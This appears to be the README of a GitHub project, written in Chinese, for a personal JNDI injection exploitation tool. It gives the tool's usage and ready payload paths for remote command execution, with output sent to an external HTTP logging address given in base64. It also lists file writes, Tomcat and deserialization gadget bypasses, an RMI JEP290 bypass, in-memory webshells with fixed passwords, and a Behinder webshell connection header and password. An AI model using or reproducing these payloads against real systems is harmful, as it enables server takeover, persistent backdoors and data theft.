🌟MYJNDIExploit

絮絮念


这是我一直在用一直更新的一个小工具。不定期更新 （主要看近期有没有学习了......）

使用指南：

Usage: java -jar  MYJNDIExploit1.1.jar [options]
Options:
* -i, --ip       Local ip address
* 
  -l, --ldapPort Ldap bind port (default: 1389)
  
  -p, --httpPort Http bind port (default: 8080)
  
  -u, --usage    Show usage (default: false)
  
  -h, --help     Show this help
  
  -o, --output   out put file

新功能介绍

添加Basic 命令回显及文件写入功能
添加反序列化命令回显及文件写入
添加tomcat 命令回显
添加动态指定路径class
将序列化生成数据写入文件
添加额外netty 内存马
添加RMI_Bypass_JEP290

修改内存马利用密码：?type=basic&hack=whoami

冰蝎连接: 添加header： User-Agentt 密码：rebeyond 后续会做密码自定义

文件写入 /Basic/PutFile/Path/Content （Path 为Base64， Content 为Base64数据 其中 ‘/’ 用 ‘_]’替换，‘+’用_@_替换）

命令回显 Basic/commandecho/[httplog 回显地址 ]/[command] 
demo:Basic/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=

tomcat也一样：TomcatBypass/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=
Deserialization/CommonsCollectionsK1/commandecho/aHR0cDovLzQ3Ljk0LjEzMC54eDo5OTkv/aXBjb25maWc=

内存正向代理：/Basic/filetertunnel

动态指定路径：自定义class 存放在当前jar 同路径里的lib文件内
/Basic/myclass/Exp

即將添加功能

内存马密码可由用户控制

使用详细说明 --> OldReadme.md

About

自己的JNDI 利用工具，添加一些人性化功能

Languages

Language:Java 99.8%Language:Dockerfile 0.2%